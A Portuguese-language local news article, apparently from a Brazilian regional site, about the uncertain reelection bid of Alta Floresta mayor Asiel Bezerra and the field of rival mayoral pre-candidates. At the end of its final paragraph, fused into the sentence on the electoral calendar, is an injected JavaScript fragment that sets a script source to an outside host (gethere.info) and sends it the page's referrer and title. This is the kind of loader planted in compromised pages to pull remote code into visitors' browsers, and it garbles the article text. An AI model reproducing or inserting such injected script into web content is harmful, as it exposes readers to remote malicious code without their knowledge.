Capa / Em Destaque / Desistencia a reeleição de Asiel Bezerra enfraquece grupo peemdebista

Desistencia a reeleição de Asiel Bezerra enfraquece grupo peemdebista

prefeito-asielFonte: Nativa News com RD NEWS

O grupo do deputado e ex-prefeito Romoaldo (PMDB) vive uma incógnita sobre quem lançar à sucessão em Alta Floresta, uma das cidades polos do Nortão. O prefeito, médico e pecuarista Asiel Bezerra, da mesma legenda peemedebista, pediu trégua para decidir se disputa ou não a reeleição. Mas, em caso de recandidatura, a chance é remota de êxito nas urnas.

Enfrenta muita desgaste por causa do mandato pífio. E essa carga negativa está comprometendo todo o bloco situacionista. O partido conta com 449 membros filiados no município, e 62 membros dadiretoria entre titulares e suplentes, teve seu atual presidente reeleito. O presidente do partido José Carlos Cavagnoli mais conhecido “Carlão” foi informado da desistencia do atual prefeito neste domingo(24) a noticia não foi bem recebida na cúpula peemedebista.

Romoaldo incentiva outros a concorrer a prefeito, como o advogado e filiado do PTB Arão Sicuto e o vereador de cinco mandatos Dida Pires, do PPS. Enquanto isso, quem ganha força nesta fase das convenções é a ex-prefeita de dois mandatos Maria Isaura (PDT).

Outra candidatura já divulgada pela imprensa é do Edinho paiva do partido PSC e o apresentador de TV Oliveira Dias do como pré-candidato a prefeito no município pelo Solidariedade, já estão praticamente definidos, faltando apenas a aprovação dos convencionais. Outros partidos, como o PP, PSD, PSDB, dentre outras siglas, ainda estão indefinidos quanto ao posicionamento a adotar nas eleições. É provável que, no caso da confirmação de Maria Izaura, pelo PDT, o partido tucano, do governador Pedro Taques, indique o candidato vice, como vem sendo discutido já há algum tempo.

Os partidos políticos estão autorizados até o dia 05 de agoto pela legislação eleitoral a realizarem convenções partidárias com vistas a definir seus candidatos para o pleito do dia 2 de outubro. calendário eleitoral elaborado pelo Tribunal Superior Eleitoral com base na lei 9.540/97.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre Altair Nery

Os comentários estão fechados.

Scroll To Top